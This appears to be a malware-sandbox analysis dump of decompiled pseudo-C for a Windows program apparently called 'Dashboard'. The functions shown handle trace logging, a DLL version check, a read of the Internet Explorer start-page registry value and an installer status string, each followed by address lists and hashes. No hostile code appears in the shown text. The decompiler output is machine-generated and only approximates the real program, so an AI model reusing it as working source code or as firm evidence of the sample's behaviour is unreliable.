                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: 3dabb59c0c737ac5d86dc2b061ef387e5db1db08990746514a7a3027db5af855
                                                                                                                    • Instruction ID: 0a2519baf87128b75f511cef19ec07de9d536b0d010832b69b33b673ce49ba5c
                                                                                                                    • Opcode Fuzzy Hash: 3dabb59c0c737ac5d86dc2b061ef387e5db1db08990746514a7a3027db5af855
                                                                                                                    • Instruction Fuzzy Hash: 3721B33A60020B9AFB275E09C804BB677A5EF84710F158159FAC58B2D1E776DA91CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E01008E3D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, char* _a24) {
                                                                                                                    				char* _t17;
                                                                                                                    				char* _t18;
                                                                                                                    				char* _t22;
                                                                                                                    				char* _t27;
                                                                                                                    				void* _t28;
                                                                                                                    				char _t29;
                                                                                                                    				char _t30;
                                                                                                                    				char* _t31;
                                                                                                                    				char* _t32;
                                                                                                                    				char* _t33;
                                                                                                                    				char* _t34;
                                                                                                                    
                                                                                                                    				_t31 = _a24;
                                                                                                                    				if(_t31 == 0) {
                                                                                                                    					_a24 = 0xa;
                                                                                                                    					L7:
                                                                                                                    					_t27 = L"NULL";
                                                                                                                    					if(_t31 == 0) {
                                                                                                                    						_t31 = _t27;
                                                                                                                    					} else {
                                                                                                                    						if( *_t31 == 0) {
                                                                                                                    							_t31 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t32 = _a20;
                                                                                                                    					if(_t32 == 0) {
                                                                                                                    						_push(0xa);
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						if( *_t32 != 0) {
                                                                                                                    							_t18 = _t32;
                                                                                                                    							_t33 =  &(_t18[2]);
                                                                                                                    							do {
                                                                                                                    								_t29 =  *_t18;
                                                                                                                    								_t18 =  &(_t18[2]);
                                                                                                                    							} while (_t29 != 0);
                                                                                                                    							_t28 = (_t18 - _t33 >> 1) + (_t18 - _t33 >> 1) + 2;
                                                                                                                    							L19:
                                                                                                                    							if(_t32 == 0) {
                                                                                                                    								_t17 = _t27;
                                                                                                                    							} else {
                                                                                                                    								if( *_t32 != 0) {
                                                                                                                    									_t17 = _t32;
                                                                                                                    								} else {
                                                                                                                    									_t17 = L"<NULL>";
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    							_push(0);
                                                                                                                    							_push(_a24);
                                                                                                                    							_push(_t31);
                                                                                                                    							_push(_t28);
                                                                                                                    							_push(_t17);
                                                                                                                    							_push(_a12);
                                                                                                                    							_push(_a16);
                                                                                                                    							_push(0x2b);
                                                                                                                    							_push(_a8);
                                                                                                                    							_push(_a4);
                                                                                                                    							L01007CCA();
                                                                                                                    							return _t17;
                                                                                                                    						}
                                                                                                                    						_push(0xe);
                                                                                                                    						L18:
                                                                                                                    						_pop(_t28);
                                                                                                                    						goto L19;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				if( *_t31 != 0) {
                                                                                                                    					_t22 = _t31;
                                                                                                                    					_t34 =  &(_t22[2]);
                                                                                                                    					do {
                                                                                                                    						_t30 =  *_t22;
                                                                                                                    						_t22 =  &(_t22[2]);
                                                                                                                    					} while (_t30 != 0);
                                                                                                                    					_a24 = (_t22 - _t34 >> 1) + (_t22 - _t34 >> 1) + 2;
                                                                                                                    				} else {
                                                                                                                    					_a24 = 0xe;
                                                                                                                    				}
                                                                                                                    			}














                                                                                                                    0x01008e42
                                                                                                                    0x01008e4a
                                                                                                                    0x01008e77
                                                                                                                    0x01008e7e
                                                                                                                    0x01008e80
                                                                                                                    0x01008e85
                                                                                                                    0x01008e94
                                                                                                                    0x01008e87
                                                                                                                    0x01008e8b
                                                                                                                    0x01008e8d
                                                                                                                    0x01008e8d
                                                                                                                    0x01008e8b
                                                                                                                    0x01008e96
                                                                                                                    0x01008e9b
                                                                                                                    0x01008ec0
                                                                                                                    0x00000000
                                                                                                                    0x01008e9d
                                                                                                                    0x01008ea1
                                                                                                                    0x01008ea7
                                                                                                                    0x01008ea9
                                                                                                                    0x01008eac
                                                                                                                    0x01008eac
                                                                                                                    0x01008eb0
                                                                                                                    0x01008eb1
                                                                                                                    0x01008eba
                                                                                                                    0x01008ec3
                                                                                                                    0x01008ec5
                                                                                                                    0x01008ed8
                                                                                                                    0x01008ec7
                                                                                                                    0x01008ecb
                                                                                                                    0x01008ed4
                                                                                                                    0x01008ecd
                                                                                                                    0x01008ecd
                                                                                                                    0x01008ecd
                                                                                                                    0x01008ecb
                                                                                                                    0x01008eda
                                                                                                                    0x01008edc
                                                                                                                    0x01008edf
                                                                                                                    0x01008ee0
                                                                                                                    0x01008ee1
                                                                                                                    0x01008ee2
                                                                                                                    0x01008ee5
                                                                                                                    0x01008ee8
                                                                                                                    0x01008eea
                                                                                                                    0x01008eed
                                                                                                                    0x01008ef0
                                                                                                                    0x01008efc
                                                                                                                    0x01008efc
                                                                                                                    0x01008ea3
                                                                                                                    0x01008ec2
                                                                                                                    0x01008ec2
                                                                                                                    0x00000000
                                                                                                                    0x01008ec2
                                                                                                                    0x01008e9b
                                                                                                                    0x01008e50
                                                                                                                    0x01008e5b
                                                                                                                    0x01008e5d
                                                                                                                    0x01008e60
                                                                                                                    0x01008e60
                                                                                                                    0x01008e64
                                                                                                                    0x01008e65
                                                                                                                    0x01008e72
                                                                                                                    0x01008e52
                                                                                                                    0x01008e52
                                                                                                                    0x01008e52

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,NULL,0000000A,00000000), ref: 01008EF0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: 25287cbf3099a98601eb92512e40b54c5f3fcf20a72fa3fe7f59891d74479017
                                                                                                                    • Instruction ID: 3e1f6e3ed8e97a7e0e0a9d76ee1d62a807deb9a7654bc221b2dccbd9d3a13181
                                                                                                                    • Opcode Fuzzy Hash: 25287cbf3099a98601eb92512e40b54c5f3fcf20a72fa3fe7f59891d74479017
                                                                                                                    • Instruction Fuzzy Hash: A0219F32E0028ADAFB275E0CCC04AB777A5FB80B50F04C056EAC54B2D0E7B4DE968780
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E0101439E(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				intOrPtr _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				intOrPtr _v20;
                                                                                                                    				char _v24;
                                                                                                                    				signed int _t20;
                                                                                                                    				signed int _t21;
                                                                                                                    				struct HINSTANCE__* _t22;
                                                                                                                    				intOrPtr* _t23;
                                                                                                                    				void* _t25;
                                                                                                                    				void* _t26;
                                                                                                                    				intOrPtr _t30;
                                                                                                                    				signed int _t34;
                                                                                                                    
                                                                                                                    				_t22 = E0101415E();
                                                                                                                    				if(_t22 == 0) {
                                                                                                                    					_t34 = 0x80004005;
                                                                                                                    				} else {
                                                                                                                    					_t23 = GetProcAddress(_t22, "DllGetVersion");
                                                                                                                    					if(_t23 == 0) {
                                                                                                                    						L13:
                                                                                                                    						_t34 = 0x80004005;
                                                                                                                    					} else {
                                                                                                                    						asm("stosd");
                                                                                                                    						asm("stosd");
                                                                                                                    						asm("stosd");
                                                                                                                    						asm("stosd");
                                                                                                                    						_v24 = 0x14;
                                                                                                                    						_t20 =  *_t23( &_v24, __edi);
                                                                                                                    						_t30 = _a4;
                                                                                                                    						_t34 = _t20;
                                                                                                                    						asm("sbb eax, eax");
                                                                                                                    						_t21 =  ~_t20;
                                                                                                                    						_t25 = 1;
                                                                                                                    						if(_v20 != _t30 || _v16 >= _a8) {
                                                                                                                    							_t26 = 0;
                                                                                                                    						} else {
                                                                                                                    							_t26 = 1;
                                                                                                                    						}
                                                                                                                    						if(_v20 != _t30 || _v16 != _a8 || _v12 >= _a12) {
                                                                                                                    							_t25 = 0;
                                                                                                                    						}
                                                                                                                    						if(_t21 != 0 || _t26 != 0 || _t25 != 0) {
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					FreeLibrary(_t22);
                                                                                                                    				}
                                                                                                                    				return _t34;
                                                                                                                    			}















                                                                                                                    0x010143ad
                                                                                                                    0x010143b1
                                                                                                                    0x01014430
                                                                                                                    0x010143b3
                                                                                                                    0x010143bf
                                                                                                                    0x010143c3
                                                                                                                    0x01014422
                                                                                                                    0x01014422
                                                                                                                    0x010143c5
                                                                                                                    0x010143cb
                                                                                                                    0x010143cc
                                                                                                                    0x010143cd
                                                                                                                    0x010143ce
                                                                                                                    0x010143d3
                                                                                                                    0x010143da
                                                                                                                    0x010143dc
                                                                                                                    0x010143e2
                                                                                                                    0x010143e4
                                                                                                                    0x010143e8
                                                                                                                    0x010143ea
                                                                                                                    0x010143ee
                                                                                                                    0x010143fc
                                                                                                                    0x010143f8
                                                                                                                    0x010143f8
                                                                                                                    0x010143f8
                                                                                                                    0x01014401
                                                                                                                    0x01014413
                                                                                                                    0x01014413
                                                                                                                    0x01014418
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01014418
                                                                                                                    0x01014428
                                                                                                                    0x01014428
                                                                                                                    0x0101443a

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0101415E: memset.MSVCR80 ref: 010141AE
                                                                                                                      • Part of subcall function 0101415E: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 010141D9
                                                                                                                      • Part of subcall function 0101415E: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000208), ref: 010141FD
                                                                                                                      • Part of subcall function 0101415E: RegCloseKey.ADVAPI32(?), ref: 0101420B
                                                                                                                      • Part of subcall function 0101415E: wcscat_s.MSVCR80 ref: 01014226
                                                                                                                      • Part of subcall function 0101415E: LoadLibraryW.KERNEL32(?), ref: 0101424F
                                                                                                                    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 010143B9
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 01014428
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressCloseFreeLoadOpenProcQueryValuememsetwcscat_s
                                                                                                                    • String ID: DllGetVersion
                                                                                                                    • API String ID: 991360154-2861820592
                                                                                                                    • Opcode ID: 994e11662d2aff298b4e85e6812ab885a5ba3e27a891f6aad952cc63365b3d27
                                                                                                                    • Instruction ID: cfc15bdceb1a3b2f5e26467cd0a77b0ade2261a63c7bec05a53b44278c5f5d4f
                                                                                                                    • Opcode Fuzzy Hash: 994e11662d2aff298b4e85e6812ab885a5ba3e27a891f6aad952cc63365b3d27
                                                                                                                    • Instruction Fuzzy Hash: 8011EB32F80516ABDB56CFACD8005EF73B6FB80311B158078E982E7128DB78DD018790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E010108EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t44;
                                                                                                                    				signed int _t48;
                                                                                                                    				void* _t50;
                                                                                                                    				signed int _t54;
                                                                                                                    
                                                                                                                    				_t44 = __edx;
                                                                                                                    				_push(0xc);
                                                                                                                    				E0100880F(E0101621C, __ebx, __edi, __esi);
                                                                                                                    				_t34 = 0;
                                                                                                                    				 *((intOrPtr*)(_t50 - 0x10)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t50 - 4)) = 0;
                                                                                                                    				E01004D33(_t50 - 0x14, 0x101a5f0);
                                                                                                                    				 *((char*)(_t50 - 4)) = 1;
                                                                                                                    				_t48 = E0100C55B(_t50 - 0x10, 0x80000001, L"Software\\Microsoft\\Internet Explorer\\Main", 0, 0, 0x2001f, 0, 0);
                                                                                                                    				_t52 = _t48;
                                                                                                                    				if(_t48 != 0) {
                                                                                                                    					L4:
                                                                                                                    					if(_t54 > 0) {
                                                                                                                    						_t48 = _t48 & 0x0000ffff | 0x80070000;
                                                                                                                    					}
                                                                                                                    					_t34 = _t48;
                                                                                                                    				} else {
                                                                                                                    					_push(L"Start Page");
                                                                                                                    					E0100653B(0, _t50 - 0x18, 0, _t48, _t52);
                                                                                                                    					 *((char*)(_t50 - 4)) = 2;
                                                                                                                    					_t48 = E010106BB( *((intOrPtr*)(_t50 - 0x10)), _t50 - 0x18, _t50 - 0x14);
                                                                                                                    					 *((char*)(_t50 - 4)) = 1;
                                                                                                                    					E01004925( *((intOrPtr*)(_t50 - 0x18)) + 0xfffffff0, _t44);
                                                                                                                    					_t53 = _t48;
                                                                                                                    					if(_t48 == 0) {
                                                                                                                    						_t34 = E01010838(0, _t44, 0, _t48, _t53, _t50 - 0x14);
                                                                                                                    					}
                                                                                                                    					E0100C53D(_t50 - 0x10);
                                                                                                                    					_t54 = _t48;
                                                                                                                    					if(_t54 != 0) {
                                                                                                                    						goto L4;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    				E01004925( *((intOrPtr*)(_t50 - 0x14)) + 0xfffffff0, _t44);
                                                                                                                    				E0100C53D(_t50 - 0x10);
                                                                                                                    				return E010088FB(_t34);
                                                                                                                    			}







                                                                                                                    0x010108ea
                                                                                                                    0x010108ea
                                                                                                                    0x010108f1
                                                                                                                    0x010108f8
                                                                                                                    0x010108fa
                                                                                                                    0x01010905
                                                                                                                    0x01010908
                                                                                                                    0x01010923
                                                                                                                    0x0101092c
                                                                                                                    0x0101092e
                                                                                                                    0x01010930
                                                                                                                    0x0101097f
                                                                                                                    0x0101097f
                                                                                                                    0x01010987
                                                                                                                    0x01010987
                                                                                                                    0x0101098d
                                                                                                                    0x01010932
                                                                                                                    0x01010932
                                                                                                                    0x0101093a
                                                                                                                    0x0101094a
                                                                                                                    0x01010959
                                                                                                                    0x0101095b
                                                                                                                    0x0101095f
                                                                                                                    0x01010964
                                                                                                                    0x01010966
                                                                                                                    0x01010971
                                                                                                                    0x01010971
                                                                                                                    0x01010976
                                                                                                                    0x0101097b
                                                                                                                    0x0101097d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101097d
                                                                                                                    0x01010995
                                                                                                                    0x0101099d
                                                                                                                    0x010109a9

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 010108F1
                                                                                                                      • Part of subcall function 0100C55B: RegCreateKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?), ref: 0100C584
                                                                                                                      • Part of subcall function 0100653B: __EH_prolog3.LIBCMT ref: 01006542
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,?), ref: 010106E0
                                                                                                                      • Part of subcall function 010106BB: SHGetValueW.SHLWAPI(?,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?), ref: 01010714
                                                                                                                      • Part of subcall function 010106BB: ??_V@YAXPAX@Z.MSVCR80 ref: 01010730
                                                                                                                      • Part of subcall function 01010838: __EH_prolog3.LIBCMT ref: 0101083F
                                                                                                                      • Part of subcall function 01010838: _wcsicmp.MSVCR80 ref: 010108C2
                                                                                                                    Strings
                                                                                                                    • Software\Microsoft\Internet Explorer\Main, xrefs: 01010916
                                                                                                                    • Start Page, xrefs: 01010932
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3$Value$Create_wcsicmp
                                                                                                                    • String ID: Software\Microsoft\Internet Explorer\Main$Start Page
                                                                                                                    • API String ID: 1836341997-3913947842
                                                                                                                    • Opcode ID: 52d59ec6db337541523abd7ad1308f1d8aadfef1d2fecfd2317ea0fac11e4637
                                                                                                                    • Instruction ID: b4d91674ef57e47e30f6b6b160d0088a8d8e7d83e4a2c73a80cf8c836d60de57
                                                                                                                    • Opcode Fuzzy Hash: 52d59ec6db337541523abd7ad1308f1d8aadfef1d2fecfd2317ea0fac11e4637
                                                                                                                    • Instruction Fuzzy Hash: A3113B31D0015A9AFB12E7E8CD94EFFB6B4AF65310F500269E6D0B32C5DA740B40C7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E0100F992(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				intOrPtr* _t17;
                                                                                                                    				signed int _t18;
                                                                                                                    				signed int _t23;
                                                                                                                    				void* _t37;
                                                                                                                    				void* _t38;
                                                                                                                    
                                                                                                                    				_push(0x10);
                                                                                                                    				E0100880F(E010160F8, __ebx, __edi, __esi);
                                                                                                                    				_t37 = __ecx;
                                                                                                                    				_t35 = 0;
                                                                                                                    				 *((intOrPtr*)(_t38 - 0x10)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t38 - 4)) = 0;
                                                                                                                    				 *((intOrPtr*)(_t38 - 0x14)) = 0;
                                                                                                                    				 *((char*)(_t38 - 4)) = 1;
                                                                                                                    				if( *((intOrPtr*)(_t38 + 8)) != 0) {
                                                                                                                    					_t17 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                                    					__eflags = _t17;
                                                                                                                    					if(_t17 != 0) {
                                                                                                                    						_t18 =  *((intOrPtr*)( *_t17 + 0x48))(_t17);
                                                                                                                    						__eflags = _t18;
                                                                                                                    						if(_t18 == 0) {
                                                                                                                    							__eflags =  *((intOrPtr*)(_t38 + 0xc));
                                                                                                                    							_t35 = E0100DB70(0, __ecx, 0, __ecx,  *((intOrPtr*)(_t38 + 0xc)),  *((intOrPtr*)(_t38 + 8)), _t18 & 0xffffff00 |  *((intOrPtr*)(_t38 + 0xc)) >= 0x00000000);
                                                                                                                    							__eflags = _t35;
                                                                                                                    							if(_t35 >= 0) {
                                                                                                                    								__eflags =  *((intOrPtr*)(_t38 + 0xc));
                                                                                                                    								if( *((intOrPtr*)(_t38 + 0xc)) >= 0) {
                                                                                                                    									_t23 = E0100CF42(_t22, _t37,  *0x101a4dc, L"Installing");
                                                                                                                    									_t35 = _t23;
                                                                                                                    									__eflags = _t23;
                                                                                                                    									if(__eflags >= 0) {
                                                                                                                    										_push(_t37);
                                                                                                                    										E0100D009(0, _t38 - 0x1c, _t35, _t37, __eflags);
                                                                                                                    										E0100EEC0(_t38 - 0x1c);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						_t35 = 0x8000ffff;
                                                                                                                    					}
                                                                                                                    				} else {
                                                                                                                    					_t35 = 0x80070057;
                                                                                                                    				}
                                                                                                                    				__imp__#6(0);
                                                                                                                    				return E010088FB(_t35);
                                                                                                                    			}








                                                                                                                    0x0100f992
                                                                                                                    0x0100f999
                                                                                                                    0x0100f99e
                                                                                                                    0x0100f9a2
                                                                                                                    0x0100f9a4
                                                                                                                    0x0100f9a7
                                                                                                                    0x0100f9aa
                                                                                                                    0x0100f9b0
                                                                                                                    0x0100f9b4
                                                                                                                    0x0100f9bd
                                                                                                                    0x0100f9c0
                                                                                                                    0x0100f9c2
                                                                                                                    0x0100f9ce
                                                                                                                    0x0100f9d1
                                                                                                                    0x0100f9d3
                                                                                                                    0x0100f9d5
                                                                                                                    0x0100f9e6
                                                                                                                    0x0100f9e8
                                                                                                                    0x0100f9ea
                                                                                                                    0x0100f9ec
                                                                                                                    0x0100f9ef
                                                                                                                    0x0100f9fe
                                                                                                                    0x0100fa03
                                                                                                                    0x0100fa05
                                                                                                                    0x0100fa07
                                                                                                                    0x0100fa09
                                                                                                                    0x0100fa0d
                                                                                                                    0x0100fa15
                                                                                                                    0x0100fa15
                                                                                                                    0x0100fa07
                                                                                                                    0x0100f9ef
                                                                                                                    0x0100f9ea
                                                                                                                    0x0100f9c4
                                                                                                                    0x0100f9c4
                                                                                                                    0x0100f9c4
                                                                                                                    0x0100f9b6
                                                                                                                    0x0100f9b6
                                                                                                                    0x0100f9b6
                                                                                                                    0x0100fa1b
                                                                                                                    0x0100fa28

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 0100F999
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0100FA1B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeH_prolog3String
                                                                                                                    • String ID: Installing
                                                                                                                    • API String ID: 3825424854-2923966484
                                                                                                                    • Opcode ID: a1aff59e95e1722283882704d4d5f88d6e493d5c5d098211c6458711e85d0406
                                                                                                                    • Instruction ID: c37afc953943eb2493726deb7c0a7b6d7a0f79b7df069bb5bd5c85a460289856
                                                                                                                    • Opcode Fuzzy Hash: a1aff59e95e1722283882704d4d5f88d6e493d5c5d098211c6458711e85d0406
                                                                                                                    • Instruction Fuzzy Hash: 3011A571900207DFEB23EF68D8805EDB761BF95200F15847EE5C5AB2C1CB798A86EB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 44%
                                                                                                                    			E01012CF6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, char _a24, char _a28) {
                                                                                                                    				void* _t11;
                                                                                                                    				char* _t12;
                                                                                                                    				char _t18;
                                                                                                                    				char* _t19;
                                                                                                                    				char* _t21;
                                                                                                                    
                                                                                                                    				_t19 = _a20;
                                                                                                                    				if(_t19 == 0) {
                                                                                                                    					_push(0xa);
                                                                                                                    					L7:
                                                                                                                    					_pop(_t11);
                                                                                                                    					L8:
                                                                                                                    					if(_t19 == 0) {
                                                                                                                    						_t19 = L"NULL";
                                                                                                                    					} else {
                                                                                                                    						if( *_t19 == 0) {
                                                                                                                    							_t19 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_push(0);
                                                                                                                    					_push(4);
                                                                                                                    					_push( &_a28);
                                                                                                                    					_push(4);
                                                                                                                    					_push( &_a24);
                                                                                                                    					_push(_t11);
                                                                                                                    					_push(_t19);
                                                                                                                    					_push(_a12);
                                                                                                                    					_push(_a16);
                                                                                                                    					_push(0x2b);
                                                                                                                    					_push(_a8);
                                                                                                                    					_push(_a4);
                                                                                                                    					L01007CCA();
                                                                                                                    					return _t11;
                                                                                                                    				}
                                                                                                                    				if( *_t19 != 0) {
                                                                                                                    					_t12 = _t19;
                                                                                                                    					_t21 =  &(_t12[2]);
                                                                                                                    					do {
                                                                                                                    						_t18 =  *_t12;
                                                                                                                    						_t12 =  &(_t12[2]);
                                                                                                                    					} while (_t18 != 0);
                                                                                                                    					_t11 = (_t12 - _t21 >> 1) + (_t12 - _t21 >> 1) + 2;
                                                                                                                    					goto L8;
                                                                                                                    				}
                                                                                                                    				_push(0xe);
                                                                                                                    				goto L7;
                                                                                                                    			}








                                                                                                                    0x01012cfb
                                                                                                                    0x01012d00
                                                                                                                    0x01012d27
                                                                                                                    0x01012d29
                                                                                                                    0x01012d29
                                                                                                                    0x01012d2a
                                                                                                                    0x01012d2c
                                                                                                                    0x01012d3b
                                                                                                                    0x01012d2e
                                                                                                                    0x01012d32
                                                                                                                    0x01012d34
                                                                                                                    0x01012d34
                                                                                                                    0x01012d32
                                                                                                                    0x01012d40
                                                                                                                    0x01012d42
                                                                                                                    0x01012d47
                                                                                                                    0x01012d48
                                                                                                                    0x01012d4d
                                                                                                                    0x01012d4e
                                                                                                                    0x01012d4f
                                                                                                                    0x01012d50
                                                                                                                    0x01012d53
                                                                                                                    0x01012d56
                                                                                                                    0x01012d58
                                                                                                                    0x01012d5b
                                                                                                                    0x01012d5e
                                                                                                                    0x01012d67
                                                                                                                    0x01012d67
                                                                                                                    0x01012d06
                                                                                                                    0x01012d0c
                                                                                                                    0x01012d0f
                                                                                                                    0x01012d12
                                                                                                                    0x01012d12
                                                                                                                    0x01012d16
                                                                                                                    0x01012d17
                                                                                                                    0x01012d20
                                                                                                                    0x00000000
                                                                                                                    0x01012d24
                                                                                                                    0x01012d08
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,00000008,00000004,?,00000004,00000000,?,01013482,6C744143,65637845), ref: 01012D5E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTrace
                                                                                                                    • String ID: <NULL>$NULL
                                                                                                                    • API String ID: 471583391-888386124
                                                                                                                    • Opcode ID: 1980b0b96b6713913cded659485a73495f8bb9013d15c650f2be3d607f3d296b
                                                                                                                    • Instruction ID: 47febf38fc3df86a124bde3ab8ce4f5bbda223d54ad5add3293d6fd8b0bea2b9
                                                                                                                    • Opcode Fuzzy Hash: 1980b0b96b6713913cded659485a73495f8bb9013d15c650f2be3d607f3d296b
                                                                                                                    • Instruction Fuzzy Hash: 7B01A27260020AEBFB16BE48CC05FB73765EB94700F64C055FA855B1E9E7B8EA9083C1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 49%
                                                                                                                    			E01008F04(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, char _a24) {
                                                                                                                    				void* _t10;
                                                                                                                    				char* _t11;
                                                                                                                    				char _t16;
                                                                                                                    				char* _t17;
                                                                                                                    				char* _t19;
                                                                                                                    
                                                                                                                    				_t17 = _a20;
                                                                                                                    				if(_t17 == 0) {
                                                                                                                    					_push(0xa);
                                                                                                                    					L7:
                                                                                                                    					_pop(_t10);
                                                                                                                    					L8:
                                                                                                                    					if(_t17 == 0) {
                                                                                                                    						_t17 = L"NULL";
                                                                                                                    					} else {
                                                                                                                    						if( *_t17 == 0) {
                                                                                                                    							_t17 = L"<NULL>";
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_push(0);
                                                                                                                    					_push(4);
                                                                                                                    					_push( &_a24);
                                                                                                                    					_push(_t10);
                                                                                                                    					_push(_t17);
                                                                                                                    					_push(_a12);
                                                                                                                    					_push(_a16);
                                                                                                                    					_push(0x2b);
                                                                                                                    					_push(_a8);
                                                                                                                    					_push(_a4);
                                                                                                                    					L01007CCA();
                                                                                                                    					return _t10;
                                                                                                                    				}
                                                                                                                    				if( *_t17 != 0) {
                                                                                                                    					_t11 = _t17;
                                                                                                                    					_t19 =  &(_t11[2]);
                                                                                                                    					do {
                                                                                                                    						_t16 =  *_t11;
